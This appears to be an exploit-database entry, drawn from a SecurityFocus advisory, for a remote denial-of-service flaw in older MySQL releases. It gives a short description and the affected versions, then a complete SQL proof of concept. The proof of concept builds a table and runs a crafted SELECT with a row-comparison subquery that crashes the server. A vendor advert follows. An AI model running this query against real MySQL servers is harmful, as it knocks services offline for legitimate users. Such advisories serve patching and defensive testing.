MySQL 6.0.9 - SELECT Statement WHERE Clause Sub-query Denial of Service vulnerabilit
source: https://www.securityfocus.com/bid/37297/info
MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.
An attacker can exploit these issues to crash the application, denying access to legitimate users.
Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable.
drop table if exists `t1`;
create table `t1`(`a` float);
insert into `t1` values (-2),(-1);
select 1 from `t1`
where
`a` <> '1' and not
row(`a`,`a`) <=>
row((select 1 from `t1` where 1=2),(select 1 from `t1`))
into @`var0`;
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo